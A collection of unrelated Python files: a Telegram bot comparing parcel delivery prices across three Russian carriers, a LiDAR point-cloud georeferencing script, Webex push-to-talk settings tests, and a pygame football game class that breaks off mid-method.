DELLIN_KEY = os.getenv('DELLIN_KEY')
DELLIN_ID = os.getenv('DELLIN_ID')
URL_DELLIN_CALC = os.getenv('URL_DELLIN_CALC')
URL_DELLIN_KLADR = os.getenv('URL_DELLIN_KLADR')
URL_SBER = os.getenv('URL_SBER')
URL_GLAVDOSTAVKA = os.getenv('URL_GLAVDOSTAVKA')
USERS = {}
bot = Bot(TELEGRAM_TOKEN)
updater = Updater(TELEGRAM_TOKEN)
def start(update, context):
USERS[update.effective_user.id] = {
'progress': 1,
'derival': '',
'arrival': ''
}
bot.send_message(update.effective_message.chat.id,
'Введите город отправления посылки'
)
def progress(update, context):
if USERS[update.effective_user.id]['progress'] == 1:
return city(update, context)
elif USERS[update.effective_user.id]['progress'] == 2:
return result(update, context)
def city(update: Update, context: CallbackContext):
USERS[update.effective_user.id]['derival'] = update['message']['text']
USERS[update.effective_user.id]['progress'] = 2
bot.send_message(update.effective_message.chat.id,
'Введите город получения посылки'
)
def result(update: Update, context: CallbackContext):
USERS[update.effective_user.id]['arrival'] = update['message']['text']
derival = USERS[update.effective_user.id]['derival'].lower()
arrival = USERS[update.effective_user.id]['arrival'].lower()
derival_dellin = requests.post(
URL_DELLIN_KLADR,
json={"appkey": DELLIN_KEY,
"q": derival,
"limit": 1}
)
arrival_dellin = requests.post(
URL_DELLIN_KLADR,
json={"appkey": DELLIN_KEY,
"q": arrival,
"limit": 1}
)
try:
derival_dellin = derival_dellin.json().get('cities')[0]['code']
arrival_dellin = arrival_dellin.json().get('cities')[0]['code']
except IndexError:
del USERS[update.effective_user.id]
keyboard = [[InlineKeyboardButton(
'Новый расчет',
callback_data='new'
)]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.send_message(update.effective_message.chat.id,
'Ошибка в названии города. Попробуйте еще.',
reply_markup=reply_markup
)
dellin = requests.post(
URL_DELLIN_CALC,
json={"appkey": DELLIN_KEY,
"sessionID": DELLIN_ID,
"derival": {"city": derival_dellin},
"arrival": {"city": arrival_dellin}
}
)
with open('sber_cities.json', 'r', encoding='utf-8') as g:
sber_cities = json.load(g)
derival_sber = [city['kladr_id'] for city in sber_cities \
if city.get('name').lower() == derival][0]
arrival_sber = [city['kladr_id'] for city in sber_cities \
if city.get('name').lower() == arrival][0]
sber = requests.post(
URL_SBER,
json={"id": "JsonRpcClient.js",
"jsonrpc": "2.0",
"method": "calculateShipping",
"params": {
"stock": True,
"kladr_id_from": derival_sber,
"kladr_id": arrival_sber,
"length": 50,
"width": 35,
"height": 35,
"weight": 5,
"cod": 0,
"declared_cost": 0,
"courier": "sberlogistics"
}
}
)
sber = sber.json()['result']['methods'][0]
with open('glav_cities.json', 'r', encoding='utf-8') as g:
GLAV_CITIES = json.load(g)
derival_glav = [city['id'] for city in GLAV_CITIES \
if city.get('name', '').lower() == derival][0]
arrival_glav = [city['id'] for city in GLAV_CITIES \
if city.get('name', '').lower() == arrival][0]
glavdostavka = requests.post(
URL_GLAVDOSTAVKA + f'&depPoint={derival_glav}&arrPoint={arrival_glav}'
)
price_glavdostavka = glavdostavka.json()['price']
dellin = dellin.json()['data']['terminals_standard']
price_dellin = dellin['price']
period_dellin = dellin['period_to']
price_sber = sber['cost']['total']['sum']
period_sber = sber['max_days']
del USERS[update.effective_user.id]
keyboard = [[InlineKeyboardButton('Новый расчет', callback_data='new')]]
reply_markup = InlineKeyboardMarkup(keyboard)
derival = derival[0].upper() + derival[1:]
arrival = arrival[0].upper() + arrival[1:]
bot.send_message(update.effective_message.chat.id,
f'Стоимость и сроки доставки посылки с габаритами '
f'не превышающими 0.5х0.35х0.35(м) и массой не более 5кг '
f'из города {derival} в город {arrival} '
f'(от терминала до терминала):\n\n'
f'Деловые линии: {price_dellin} руб. '
f'До {period_dellin} дней.\n'
f'СберЛогистика: {price_sber} руб. '
f'До {period_sber} дней.\n'
f'ГлавДоставка: {price_glavdostavka} руб',
reply_markup=reply_markup
)
def button(update: Update, context: CallbackContext):
start(update, context)
def main():
start_handler = CommandHandler('start', start)
updater.dispatcher.add_handler(start_handler)
updater.dispatcher.add_handler(CallbackQueryHandler(button))
updater.dispatcher.add_handler(MessageHandler(Filters.text, progress))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
"""
Sample script to combine LiDAR data to generate point cloud.
"""
import argparse
import datetime
import matplotlib.pyplot
import numpy
import pytz
import scipy.interpolate
import scipy.spatial.transform
import utm
from mpl_toolkits.mplot3d import Axes3D
import cepton_sdk.export
import cepton_sdk.plot
from cepton_sdk.common import *
from cepton_util.common import *
def from_gps_time(weeks, seconds):
d = datetime.datetime(1980, 1, 6) + \
datetime.timedelta(weeks=weeks, seconds=seconds)
# leapseconds
d -= datetime.timedelta(seconds=18)
return pytz.utc.localize(d).timestamp()
class Transforms(StructureOfArrays):
def __init__(self, n=0):
super().__init__(n)
self.timestamps = numpy.zeros([n])
self.translations = numpy.zeros([n, 3])
self.quaternions = numpy.zeros([n, 4])
@classmethod
def _get_array_member_names(cls):
return ["timestamps", "translations", "quaternions"]
@property
def rotations(self):
return scipy.spatial.transform.Rotation(self.quaternions)
def main():
parser = argparse.ArgumentParser(
usage="%(prog)s [OPTIONS] output_path",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("output", help="Output path.")
parser.add_argument("--downsample", action="store_true")
parser.add_argument("--points_path", help="Path to points", required=True)
parser.add_argument(
"--serial_path", help="Path to serial data", required=True)
parser.add_argument("--version", action="version",
version="cepton_sdk {}".format(cepton_sdk.__version__))
args = parser.parse_args()
output_path = fix_path(args.output)
# Load points
points_path = fix_path(args.points_path)
points = cepton_sdk.export.load_points_las(points_path)[0]
# Load serial
serial_path = fix_path(args.serial_path)
with open(serial_path, "r") as f:
serial_lines = f.readlines()
transforms = Transforms(len(serial_lines))
i_transform = 0
for line in serial_lines:
if line.startswith("#INSPVA"):
# Novatel
line = line.lstrip("#").split("*")[0]
header, data = line.split(";")
header = header.split(",")
data = [None, None] + data.split(",")
if len(data) != 14:
continue
if data[13] != "INS_SOLUTION_GOOD":
continue
transforms.timestamps[i_transform] = \
from_gps_time(float(data[2]), float(data[3]))
transforms.translations[i_transform, :2] = utm.from_latlon(
float(data[4]), float(data[5]))[:2]
if i_transform == 0:
print("UTM: {}".format(utm.from_latlon(
float(data[4]), float(data[5]))[2:]))
transforms.translations[i_transform, 2] = float(data[6])
transforms.quaternions[i_transform, :] = \
scipy.spatial.transform.Rotation.from_euler(
"zxy",
[-float(data[12]), float(data[11]), float(data[10])],
degrees=True).as_quat()
i_transform += 1
transforms = transforms[:i_transform]
t_diff = numpy.diff(transforms.timestamps)
assert (numpy.all(t_diff > 0))
# DEBUG
print(datetime.datetime.utcfromtimestamp(transforms.timestamps[0]))
print(datetime.datetime.utcfromtimestamp(points.timestamps[0]))
print(datetime.datetime.utcfromtimestamp(points.timestamps[-1]))
print(datetime.datetime.utcfromtimestamp(transforms.timestamps[-1]))
# HACK
# points.timestamps_usec[:] += to_usec(
# 30 + transforms.timestamps[0] - points.timestamps[0])
# Plot point timestamps
# matplotlib.pyplot.plot(points.timestamps)
# matplotlib.pyplot.show()
# return
# Plot 3d trajectory
# fig = matplotlib.pyplot.figure()
# ax = fig.add_subplot(projection="3d")
# matplotlib.pyplot.plot(
# transforms.translations[:, 0], transforms.translations[:, 1],
# transforms.translations[:, 2], 'o')
# matplotlib.pyplot.show()
# return
# Plot 2d trajectory with directions
# matplotlib.pyplot.axis("equal")
# matplotlib.pyplot.plot(
# transforms.translations[:, 0], transforms.translations[:, 1])
# directions = numpy.zeros([len(transforms), 3])
# directions[:, 1] = 1.0
# directions = transforms.rotations.apply(directions)
# matplotlib.pyplot.quiver(
# transforms.translations[::10, 0], transforms.translations[::10, 1],
# directions[::10, 0], directions[::10, 1])
# matplotlib.pyplot.show()
# return
indices = numpy.arange(0, len(points))
# Apply pose
is_valid = numpy.logical_and(
points.timestamps > transforms.timestamps[0],
points.timestamps < transforms.timestamps[-1])
indices = indices[is_valid]
translations_tmp = scipy.interpolate.interp1d(
transforms.timestamps, transforms.translations, axis=0)(
points.timestamps[indices])
rotations_tmp = \
scipy.spatial.transform.Slerp(
transforms.timestamps, transforms.rotations)(
points.timestamps[indices])
points.positions[indices, :] = \
rotations_tmp.apply(points.positions[indices, :]) + \
translations_tmp
# Grid downsample
if args.downsample:
grid_ub = numpy.full([3], 1e4)
grid_lb = -grid_ub
grid_spacing = numpy.full([3], 0.01)
grid_shape = ((grid_ub - grid_lb) / grid_spacing).astype(int)
def get_flat_grid_indices(positions):
grid_indices = ((positions - grid_lb) / grid_spacing).astype(int)
is_valid = numpy.logical_and(
numpy.all(grid_indices >= 0, axis=1),
numpy.all(grid_indices < grid_shape, axis=1))
flat_grid_indices = numpy.full(grid_indices.shape[0], -1)
flat_grid_indices[is_valid] = numpy.ravel_multi_index(
grid_indices[is_valid, :].transpose(), grid_shape)
return flat_grid_indices
grid_indices = get_flat_grid_indices(points.positions[indices, :])
is_valid = grid_indices >= 0
indices = indices[is_valid]
grid_indices = grid_indices[is_valid]
is_valid = numpy.unique(grid_indices, return_index=True)[1]
indices = indices[is_valid]
grid_indices = grid_indices[is_valid]
assert (len(indices) > 0)
points = points[indices]
# Save
cepton_sdk.export.save_points(
points, output_path, file_type=cepton_sdk.export.PointsFileType.LAS)
# Load
points_tmp = cepton_sdk.export.load_points(output_path)[0]
assert (numpy.max(numpy.abs(points.positions - points_tmp.positions)) < 1e-3)
points = points_tmp
# Plot points
cepton_sdk.plot.plot_points(points)
if __name__ == "__main__":
main()
|
"""
Test for person PTT settings
"""
import random
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
from dataclasses import dataclass
from wxc_sdk.all_types import *
from .base import TestCaseWithUsers
class TestRead(TestCaseWithUsers):
def test_001_read_all(self):
"""
Read PTT settings of all users
"""
ptt = self.api.person_settings.push_to_talk
with ThreadPoolExecutor() as pool:
settings = list(pool.map(lambda user: ptt.read(person_id=user.person_id),
self.users))
print(f'Got PTTsettings for {len(self.users)} users')
print('\n'.join(s.json() for s in settings))
@dataclass(init=False)
class TestUpdate(TestCaseWithUsers):
@contextmanager
def target_user(self):
"""
Get target user
"""
user = random.choice(self.users)
ptt = self.api.person_settings.push_to_talk
settings = ptt.read(person_id=user.person_id)
try:
yield user
finally:
# restore old settings
ptt.configure(person_id=user.person_id, settings=settings)
restored = ptt.read(person_id=user.person_id)
self.assertEqual(settings, restored)
def test_001_toggle_allow_auto_answer(self):
"""
Toggle allow_auto_answer on random user
"""
with self.target_user() as user:
ptt = self.api.person_settings.push_to_talk
user: Person
before = ptt.read(person_id=user.person_id)
settings = PushToTalkSettings(allow_auto_answer=not before.allow_auto_answer)
ptt.configure(person_id=user.person_id, settings=settings)
after = ptt.read(person_id=user.person_id)
self.assertEqual(settings.allow_auto_answer,
after.allow_auto_answer)
after.allow_auto_answer = before.allow_auto_answer
self.assertEqual(before, after)
def test_002_toggle_connection_type(self):
"""
Toggle connection_type on random user
"""
with self.target_user() as user:
ptt = self.api.person_settings.push_to_talk
user: Person
before = ptt.read(person_id=user.person_id)
settings = PushToTalkSettings(connection_type=next(ct for ct in PTTConnectionType
if ct != before.connection_type))
ptt.configure(person_id=user.person_id, settings=settings)
after = ptt.read(person_id=user.person_id)
self.assertEqual(settings.connection_type,
after.connection_type)
after.connection_type = before.connection_type
self.assertEqual(before, after)
def test_003_toggle_access_type(self):
"""
Toggle access_type on random user
"""
with self.target_user() as user:
ptt = self.api.person_settings.push_to_talk
user: Person
before = ptt.read(person_id=user.person_id)
settings = PushToTalkSettings(access_type=next(at for at in PushToTalkAccessType
if at != before.access_type))
ptt.configure(person_id=user.person_id, settings=settings)
after = ptt.read(person_id=user.person_id)
self.assertEqual(settings.access_type,
after.access_type)
after.access_type = before.access_type
self.assertEqual(before, after)
def test_004_add_members(self):
"""
Toggle access_type on random user
"""
with self.target_user() as user:
ptt = self.api.person_settings.push_to_talk
user: Person
before = ptt.read(person_id=user.person_id)
members_before = before.members or []
members_before_ids = set(m.member_id for m in members_before)
candidates = [user for user in self.users if user.person_id not in members_before_ids]
if len(candidates) < 5:
self.skipTest('Need at least 5 users to add')
to_add = random.sample(candidates, 5)
settings = PushToTalkSettings(members=[MonitoredMember(member_id=u.person_id) for u in to_add])
ptt.configure(person_id=user.person_id, settings=settings)
after = ptt.read(person_id=user.person_id)
self.assertEqual(len(to_add), len(after.members))
to_add_set = set(m.person_id for m in to_add)
members_set_after = set(m.member_id for m in after.members)
self.assertEqual(to_add_set, members_set_after)
after.members = before.members
self.assertEqual(before, after)
def test_005_add_members_by_id(self):
"""
Toggle access_type on random user
"""
with self.target_user() as user:
ptt = self.api.person_settings.push_to_talk
user: Person
before = ptt.read(person_id=user.person_id)
members_before = before.members or []
members_before_ids = set(m.member_id for m in members_before)
candidates = [user for user in self.users if user.person_id not in members_before_ids]
if len(candidates) < 5:
self.skipTest('Need at least 5 users to add')
to_add = random.sample(candidates, 5)
settings = PushToTalkSettings(members=[u.person_id for u in to_add])
ptt.configure(person_id=user.person_id, settings=settings)
after = ptt.read(person_id=user.person_id)
self.assertEqual(len(to_add), len(after.members))
to_add_set = set(m.person_id for m in to_add)
members_set_after = set(m.member_id for m in after.members)
self.assertEqual(to_add_set, members_set_after)
after.members = before.members
self.assertEqual(before, after)
|
"""
Contains the central game class
Manages interactions with the players and the ball
"""
from settings import *
from const import ACT
from ball import Ball
from stats import Stats
from camera import Camera
from pygame import mixer
import time
mixer.init(44100, -16, 2, 2048)
applause = mixer.Sound(APPLAUSE)
kick = mixer.Sound(KICK)
single_short_whistle = mixer.Sound(SINGLE_SHORT_WHISTLE)
single_long_whistle = mixer.Sound(SINGLE_LONG_WHISLTE)
three_whistles = mixer.Sound(THREE_WHISTLES)
applause = mixer.Sound(APPLAUSE)
class Game:
""" Class that controls the entire game """
def __init__(self, team1, team2, sound=True, difficulty=0.6, cam='default'):
"""
Initializes the game
Attributes:
team1 (Team): Right-facing team
team2 (Team): Left-facing team
sound (bool): Enable / Disable in-game sounds
difficulty (float): Game difficulty (0-1)
"""
self.sound = sound
self.difficulty = difficulty
self.debug = False
self.team1 = team1
self.team1.init(id=1, dir='L', diff=self.difficulty) # direction is hardcoded, don't change
self.team2 = team2
self.team2.init(id=2, dir='R', diff=self.difficulty)
self.ball = Ball(pos=(W//2, H//2), sound=sound)
self.stats = Stats()
self.cam = Camera(self.ball.pos.x, self.ball.pos.y, mode=cam)
self.end = False # True when the game ends (never probably)
self.pause = False
self.state_prev = None
# game state to be passed to agents (see get_state() function)
self.state = None
self.rewards = None
if self.sound:
single_short_whistle.play()
applause.play(-1)
def check_interruptions(self):
"""
Check for special keyboard buttons
Sets internal flags to pause, quit the game or run it in debug mode
"""
for event in pygame.event.get():
if event.type == pygame.QUIT: # Quit
mixer.pause()
if self.sound:
three_whistles.play()
self.end = True
pygame.quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: # Pause menu
self.pause = not self.pause
if self.pause:
mixer.pause()
if self.sound:
single_long_whistle.play()
else:
if self.sound:
single_short_whistle.play()
applause.play(-1)
if event.key == pygame.K_BACKSPACE: # Return to main menu
mixer.stop()
self.end = True
if event.key == pygame.K_SPACE: # Toggle whether to maintain formation
self.team1.maintain_formation = not self.team1.maintain_formation
if event.key == pygame.K_d: # Debug mode
mods = pygame.key.get_mods()
if mods & pygame.KMOD_CTRL and mods & pygame.KMOD_SHIFT and mods & pygame.KMOD_ALT:
self.debug = not self.debug
def same_team_collision(self, team, free):
"""
Check if current player collides with any other players of the same team
"""
min_dist = P(2*PLAYER_RADIUS, 2*PLAYER_RADIUS)
if not free:
min_dist.x += BALL_RADIUS
for player1 in team.players:
for player2 in team.players:
if player1.id != player2.id and abs(player1.pos.x - player2.pos.x) <= min_dist.x and abs(player1.pos.y - player2.pos.y) <= min_dist.y:
xincr = 1 + PLAYER_RADIUS - \
abs(player1.pos.x-player2.pos.x)//2
xdir = (1, -1)
yincr = 1 + PLAYER_RADIUS - \
abs(player1.pos.y-player2.pos.y)//2
ydir = (1, -1)
if player1.pos.x < player2.pos.x:
xdir = (-1, 1)
if player1.pos.y < player2.pos.y:
ydir = (-1, 1)
player1.pos.x += xdir[0]*xincr
player2.pos.x += xdir[1]*xincr
player1.pos.y += ydir[0]*yincr
player2.pos.y += ydir[1]*yincr
def diff_team_collision(self, team1, team2, free):
"""
Check if current player collides with any other players of the opposite team
"""
min_dist = P(2*PLAYER_RADIUS, 2*PLAYER_RADIUS)
if not free:
min_dist.x += BALL_RADIUS
for player1 in team1.players:
for player2 in team2.players:
if abs(player1.pos.x - player2.pos.x) <= min_dist.x and abs(player1.pos.y - player2.pos.y) <= min_dist.y:
if not free:
self.ball.reset(self.ball.pos)
xincr = 1 + 2*PLAYER_RADIUS - \
abs(player1.pos.x-player2.pos.x)//2
xdir = (1, -1)
yincr = 1 + 2*PLAYER_RADIUS - \
abs(player1.pos.y-player2.pos.y)//2
ydir = (1, -1)
if player1.pos.x < player2.pos.x:
xdir = (-1, 1)
if player1.pos.y < player2.pos.y:
ydir = (-1, 1)
player1.pos.x += xdir[0]*xincr
player2.pos.x += xdir[1]*xincr
player1.pos.y += ydir[0]*yincr
player2.pos.y += ydir[1]*yincr
def collision(self, team1, team2, ball):
"""
Handle collisions between all in-game players.
"""
self.same_team_collision(team1, self.ball.free)
self.same_team_collision(team2, self.ball.free)
self.diff_team_collision(team1, team2, self.ball.free)
def text_draw(self, win, text, rect, align='center'):
"""
Utility to draw text
Attributes:
win (pygame.display): window for rendering
text (pygame.font (rendered)): The text object
rect (tuple): Rectangle specified as (x, y, width, height)
align (string): text alignment can be one of 'left', 'right', 'center' (defaults to 'center')
"""
width = text.get_width()
height = text.get_height()
center_x = round(rect[0] + rect[2]/2)
center_y = round(rect[1] + rect[3]/2)
if align == 'left':
final_rect = (round(rect[0]), round(center_y - height/2))
elif align == 'right':
final_rect = (round(rect[0] + rect[2] - width), round(center_y - height/2))
else: # Center
final_rect = (round(center_x - width/2), round(center_y - height/2))
win.blit(text, final_rect)
def goal_draw(self, win):
"""
Display the current score (goals for each side)
"""
#""" Show game score """
goal1_rect = (W//2 - GOAL_DISP_SIZE - 2*LINE_WIDTH,
0, GOAL_DISP_SIZE, GOAL_DISP_SIZE)
goal2_rect = (W//2 + 2*LINE_WIDTH, 0, GOAL_DISP_SIZE, GOAL_DISP_SIZE)
goal_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE)
pygame.draw.rect(win, (255, 255, 255), goal1_rect)
pygame.draw.rect(win, (255, 255, 255), goal2_rect)
text = goal_font.render(str(self.stats.goals[1]), True, (0, 0, 0))
self.text_draw(win, text, goal1_rect)
text = goal_font.render(str(self.stats.goals[2]), True, (0, 0, 0))
self.text_draw(win, text, goal2_rect)
def overlay_draw(self, win):
scale_rect = lambda x,y,w,h: (OVER_TOP_LEFT.x + x*OVER_SIZE.x//W, OVER_TOP_LEFT.y + y*OVER_SIZE.y//H, w*OVER_SIZE.x//W, h*OVER_SIZE.y//H)
scale_pt = lambda x,y: (OVER_TOP_LEFT.x + x*OVER_SIZE.x//W, OVER_TOP_LEFT.y + y*OVER_SIZE.y//H)
r = scale_rect(0,0,W,H)
s = pygame.Surface((r[2],r[3]), pygame.SRCALPHA)
s.fill((0,0,0,75))
win.blit(s, (r[0],r[1]))
#pygame.draw.rect(win, (0, 136, 3, 100), r)
pygame.draw.rect(win, (255,255,255), r, LINE_WIDTH)
pygame.draw.rect(win, (255,255,255),
scale_rect(self.cam.c.x - self.cam.params['pt'].x//2, self.cam.c.y - self.cam.params['pt'].y//2,
self.cam.params['pt'].x, self.cam.params['pt'].y), LINE_WIDTH)
pygame.draw.rect(win, (255, 255, 255), scale_rect(0.95*W-LINE_WIDTH//2,
GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # right penalty
pygame.draw.rect(win, (255, 255, 255), scale_rect(LINE_WIDTH//2,
GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # left penalty
pygame.draw.rect(win, self.team2.color,scale_rect(W - 3*LINE_WIDTH,
GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # right goal
pygame.draw.rect(win, self.team1.color,scale_rect(0,
GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # left goal
pygame.draw.rect(win, (255, 255, 255),
scale_rect(W//2 - LINE_WIDTH//2, 0, LINE_WIDTH, H)) # mid line
for player in self.team1.players:
pygame.draw.circle(win, self.team1.color, scale_pt(*player.pos.val),
PLAYER_RADIUS//3)
for player in self.team2.players:
pygame.draw.circle(win, self.team2.color, scale_pt(*player.pos.val),
PLAYER_RADIUS//3)
pygame.draw.circle(win, (42,42,42), scale_pt(*(self.ball.pos + PLAYER_CENTER).val),
BALL_RADIUS)
def field_draw(self, win, hints):
"""
Draw the football pitch
Attributes:
win (pygame.display): window for rendering
hints (bool): If (movement-based) hints are to be shown
"""
win.fill((0,0,0)) # constant black
self.cam.rect(win, (14, 156, 23), (0,0,W,H)) # green ground
self.cam.rect(win, (255, 255, 255), (0, 0, W -
LINE_WIDTH, H - LINE_WIDTH), LINE_WIDTH) # border
self.cam.rect(win, (255, 255, 255),
(W//2 - LINE_WIDTH//2, 0, LINE_WIDTH, H)) # mid line
self.cam.circle(win, (255, 255, 255), (W//2, H//2),
H//10, LINE_WIDTH) # mid circle
self.cam.rect(win, (255, 255, 255), (0.9*W - LINE_WIDTH //
2, 0.2*H, 0.1*W, 0.6*H), LINE_WIDTH) # right D
self.cam.rect(win, (255, 255, 255), (LINE_WIDTH//2,
0.2*H, 0.1*W, 0.6*H), LINE_WIDTH) # left D
self.cam.rect(win, (255, 255, 255), (0.95*W-LINE_WIDTH//2,
GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # right penalty
self.cam.rect(win, (255, 255, 255), (LINE_WIDTH//2,
GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # left penalty
self.cam.rect(win, self.team2.color, (W - 3*LINE_WIDTH,
GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # right goal
self.cam.rect(win, self.team1.color, (0,
GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # left goal
if self.cam.mode != 'full':
self.overlay_draw(win)
if hints:
field_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//2)
text_esc = field_font.render('Esc: pause', True, (0, 100, 0))
text_back = field_font.render(
'Backspace: return to menu', True, (0, 100, 0))
text_space = field_font.render(
'Space: Toggle formation', True, (0, 100, 0))
text_team1_form = field_font.render(
f'Maintain formation: {"ON" if self.team1.maintain_formation else "OFF"}', True, (0, 100, 0))
self.text_draw(win, text_esc, (W - 2*0.1*W - 3*LINE_WIDTH,
3*LINE_WIDTH, 2*0.1*W, 0.05*H), align='right')
self.text_draw(win, text_space, (W - 3*0.1*W - 3*LINE_WIDTH,
3*LINE_WIDTH, 2*0.1*W, 0.05*H), align='left')
self.text_draw(win, text_back, (W - 0.2*W - 3*LINE_WIDTH,
3*LINE_WIDTH + 0.05*H, 0.2*W, 0.05*H), align='left')
self.text_draw(win, text_team1_form, (3*LINE_WIDTH,
3*LINE_WIDTH, 0.2*W, 0.05*H), align='left')
if self.debug:
self.cam.circle(win, (0, 200, 100), (0, H//2),
AI_SHOOT_RADIUS, LINE_WIDTH) # AI Shoot radius
self.cam.circle(win, (0, 200, 100), (W, H//2),
AI_SHOOT_RADIUS, LINE_WIDTH) # AI shoot radius
text_debug = field_font.render(
f'Developer mode: ON', True, (0, 100, 0))
self.text_draw(win, text_debug, (3*LINE_WIDTH, 3*LINE_WIDTH +
0.05*H, 0.2*W, 0.05*H), align='left') # Developer model
def draw(self, win, hints=True):
"""
Draw the entire game
Calls ```field_draw()``` along with the ```draw()``` methods for each team and the ball
"""
self.field_draw(win, hints=hints)
if hints:
self.goal_draw(win)
self.team1.draw(win, self.cam, debug=self.debug)
self.team2.draw(win, self.cam, debug=self.debug)
self.ball.draw(win, self.cam, debug=self.debug)
def practice_instr_draw(self, win):
"""
Draw the practice game instructions (shows extra hints and keyboard controls)
"""
title_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE)
title_text = title_font.render('PRACTICE', True, (0, 100, 0))
self.text_draw(win, title_text, (0, 0, W, 0.01*H))
field_font = pygame.font.Font(FONT_MONO, FONT_SIZE//2)
text_shoot1 = field_font.render(' Q W E', True, (0, 100, 0))
text_shoot2 = field_font.render('Shoot: A D', True, (0, 100, 0))
text_shoot3 = field_font.render(' Z X C', True, (0, 100, 0))
text_move = field_font.render(f'Move: Arrow keys', True, (0, 100, 0))
self.text_draw(win, text_move, (3*LINE_WIDTH,
3*LINE_WIDTH, 0.2*W, 0.05*H))
self.text_draw(win, text_shoot1, (3*LINE_WIDTH + 0.2*W, 3 *
LINE_WIDTH, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
self.text_draw(win, text_shoot2, (3*LINE_WIDTH + 0.2*W, 3 *
LINE_WIDTH + 0.05*H, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
self.text_draw(win, text_shoot3, (3*LINE_WIDTH + 0.2*W, 3*LINE_WIDTH +
2*0.05*H, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
def bar_draw(self, win, dim, w0, h0, w, h, col, val, debug_text, invert=False):
"""
Draw a bar in the pause menu (for statistics)
Attributes:
win: Main window used for all drawing
dim ([int]): extra dimensions for the pause menu
w0 (int): x coordinate of the bar's top left point
h0 (int): y coordinate of the bar's top left point
w (int): width of the bar
h (int): height of the bar
col ([int]): color of the bar (RGB tuple)
val (float): % of the bar to fill (between 0 and 1)
debug_text (str): Text to display in debug mode
invert (bool): Flip the bar left to right
"""
W_, H_, W0, H0, pad, min_len = dim
inv_col = (255-col[0], 255-col[1], 255-col[2])
if self.debug:
text = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//3).render(
debug_text, True, inv_col)
else:
text = pygame.font.Font(
FONT_ROBOTO, FONT_SIZE//3).render(
f'{round(100*val)}%', True, inv_col)
if int(val*w) > min_len:
if invert:
pygame.draw.rect(win, col, (round(w0 + w*(1-val)), round(h0),
round(val*w), round(h)))
self.text_draw(win, text, (round(w0 + w*(1-val)), round(h0),
round(val*w), round(h)))
else:
pygame.draw.rect(win, col, (round(w0), round(h0),
round(val*w), round(h)))
self.text_draw(win, text, (round(w0), round(h0),
round(val*w), round(h)))
pygame.draw.rect(win, (0, 0, 0), (round(w0), round(h0),
round(w), round(h)), LINE_WIDTH)
def bar_label_draw(self, win, dim, w0, h0, w, h, text):
"""
Draw the label of a bar in the pause menu (for statistics)
Attributes:
win: Main window used for all drawing
dim ([int]): extra dimensions for the pause menu
w0 (int): x coordinate of the bar's top left point
h0 (int): y coordinate of the bar's top left point
w (int): width of the bar
h (int): height of the bar
text (str): Text to display in the label
"""
W_, H_, W0, H0, pad, min_len = dim
text_pos = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//2).render(text, True, (255, 255, 255))
self.text_draw(win, text_pos, (w0, h0, w, h))
def pause_box_draw(self, win, dim):
"""
Draw the skeleton of the pause menu (bg, title, exit button)
Attributes:
win: Main window used for all drawing
dim ([int]): extra dimensions for the pause menu
"""
W_, H_, W0, H0, pad, min_len = dim
# background and border
pygame.draw.rect(win, (42, 42, 42), (W0, H0, W_ -
LINE_WIDTH, H_ - LINE_WIDTH)) # border
# Title
text_title = pygame.font.Font(FONT_ROBOTO, FONT_SIZE).render(
"Pause Menu", True, (255, 255, 255))
self.text_draw(win, text_title, (W0 + pad, H0 +
0.05*H_, W_ - pad, 0.04*H_))
# Exit button
text_close1 = pygame.font.Font(
FONT_ROBOTO, FONT_SIZE).render("x", True, (255, 0, 0))
text_close2 = pygame.font.Font(
FONT_ROBOTO, FONT_SIZE//5).render("(ESCAPE)", True, (255, 0, 0))
self.text_draw(win, text_close1, (W0 + 9*0.1*W_ - pad,
H0 + 0.03*H_, 0.1*W_, 0.05*H))
self.text_draw(win, text_close2, (W0 + 9*0.1*W_ - pad,
H0 + 0.08*H_, 0.1*W_, 0.05*H))
def pause_draw(self, win):
"""
Draw the pause menu
Displays statistics for possession, pass accuracy and shot accuracy
"""
W_, H_ = int(0.8*W), int(0.8*H)
W0, H0 = int(0.1*W), int(0.1*H)
pad = W_*0.02
min_len = W_*0.01
dim = [W_, H_, W0, H0, pad, min_len] # extra dimensions for the pause menu
self.pause_box_draw(win, dim)
# Possession
pos = self.stats.get_possession()
self.bar_label_draw(win, dim,
W0, H0 + 0.15*H_, W_, 0.1*H_,
"POSSESSION")
self.bar_draw(win, dim, # team 1
W0 + pad, H0 + 0.25*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team1.color, val=pos[0],
debug_text=f'{int(round(100*pos[0],0))} ({self.stats.pos[1]})')
self.bar_draw(win, dim, # team 2
W0 + W_/2, H0 + 0.25*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team2.color, val=pos[1], invert=True,
debug_text=f'{int(round(100*pos[1],0))} ({self.stats.pos[2]})')
# Pass accuracy
pa = self.stats.get_pass_acc()
self.bar_label_draw(win, dim,
W0, H0 + 0.35*H_, W_, 0.1*H_,
"PASS ACCURACY")
self.bar_draw(win, dim, # team 1
W0 + pad, H0 + 0.45*H_, (W_ - 2*pad)/2, 0.05*H_,
col=self.team1.color, val=pa[0],
